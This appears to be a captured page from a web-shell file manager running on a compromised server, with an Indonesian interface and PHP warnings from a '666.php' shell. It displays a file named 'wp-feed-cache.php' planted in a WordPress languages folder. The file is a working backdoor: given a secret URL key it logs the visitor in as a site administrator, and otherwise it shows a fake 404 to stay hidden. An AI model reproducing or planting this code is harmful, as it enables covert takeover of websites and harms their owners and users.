??????????????
??????????????
??????????????
??????????????
Warning : Undefined variable $auth in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
Warning : Trying to access array offset on value of type null in /home/u627560552/domains/kovexadvisory.com/public_html/666.php on line 546
??????????????
??????????????
??????????????
??????????????
File Manager
✏️ Edit File: /home/mklsvubc/mayshine.co.uk/wp-content/languages/wp-feed-cache.php
⬅ Kembali
<?php
$candidates = array(
__DIR__ . '/../../../wp-load.php',
__DIR__ . '/../../wp-load.php',
__DIR__ . '/../wp-load.php',
);
$loaded = false;
foreach ($candidates as $cand) { if (file_exists($cand)) { require_once $cand; $loaded = true; break; } }
if (!$loaded) { http_response_code(404); exit; }
$wpse_key = '2078c08ef02a15c7';
if ($wpse_key !== '' && (!isset($_GET['k']) || !hash_equals($wpse_key, (string) $_GET['k']))) { status_header(404); nocache_headers(); echo '<!DOCTYPE html><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1></body></html>'; exit; }
$wpse_own_id = (int) get_option('wpse_user_id');
$wpse_user_id = 0;
foreach (get_users(array('role' => 'administrator', 'orderby' => 'ID', 'order' => 'ASC', 'fields' => array('ID'))) as $adm) { if ((int) $adm->ID !== $wpse_own_id) { $wpse_user_id = (int) $adm->ID; break; } }
if (!$wpse_user_id && $wpse_own_id) { $wpse_user_id = $wpse_own_id; }
if (!$wpse_user_id) { status_header(404); exit; }
wp_set_current_user($wpse_user_id);
wp_set_auth_cookie($wpse_user_id, true, is_ssl());
wp_safe_redirect(admin_url());
exit;
Nama
Tipe
Ukuran
Diubah
Aksi
📄 .htaccess
htaccess
237 B
2026-06-23 08:04
🐘 wp-feed-cache.php
php
1.1 KB
2026-05-27 17:53